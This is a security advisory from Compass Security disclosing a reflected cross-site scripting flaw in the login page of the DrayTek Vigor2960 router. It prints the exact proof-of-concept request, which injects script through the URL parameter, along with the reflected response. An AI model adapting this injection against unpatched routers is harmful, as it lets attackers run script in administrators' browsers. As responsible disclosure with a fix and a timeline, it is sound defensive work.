#############################################################
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
#############################################################
#
# Product:   Router Vigor2960 [1]
# Vendor:    DrayTek
# CSNC ID:   CSNC-2019-003
# Subject:   Reflected Cross-Site Scripting (XSS)
# Risk:      Low
# Effect:    Remotely exploitable
# Author:    Lukasz D. (advisories@compass-security.com)
# Date:      08.04.2019
#
#############################################################

Introduction:
-------------
Vigor2960 is a dual-WAN broadband router/VPN gateway for up to 200 simultaneous
VPN connections, equipped with 2 Gigabit Ethernet load balancing WAN ports and
4 Gigabit LAN ports, and there are 2 USB ports through which cellular Internet
connectivity can be added.

The Web User Interface of the router was found to be vulnerable to a common
security flaw that allows an attacker to execute malicious code in the browser
of users that followed a manipulated link to access the Web User Interface.

Affected:
---------
The following Vigor2960 firmware versions are vulnerable:
1.4.2 and possibly earlier versions

Technical Description:
----------------------
The Web User Interface of Vigor2960 is vulnerable to a reflected Cross-Site
Scripting (XSS) attack. The URL parameter sent in the authentication request
will be reflected unencoded in the HTML page returned after unsuccessful
authentication:

Request:
GET /cgi-bin/mainfunction.cgi?action=authuser&
                              formusername=a&
                              formpassword=a&
                              HOST=a&
                              URL="%2balert('XSS')%2b" HTTP/1.1
Host: 192.168.1.1

Response:
HTTP/1.1 200 OK
Expires: Mon, 28 Jan 2019 15:37:00 GMT
Cache-Control: max-age=7200
Content-type: text/html
Date: Mon, 28 Jan 2019 13:37:00 GMT
Server: DWS
Content-Length: 120

<SCRIPT LANGUAGE="JavaScript">alert("Wrong Username or Password!!");
window.location.replace(""+alert('XSS')+"")</SCRIPT>

Workaround / Fix:
-----------------
It needs to be ensured that all user-provided parameters are properly encoded
before being reflected into the HTML webpage.

Timeline:
---------
2019-01-28:   Vulnerability discovered
2019-01-29:   Initial vendor notification
2019-01-29:   Initial vendor response
2019-03-13:   Patched version 1.4.3 released
2019-04-08:   Public disclosure

References:
-----------
[1]: https://www.draytek.com/products/vigor2960/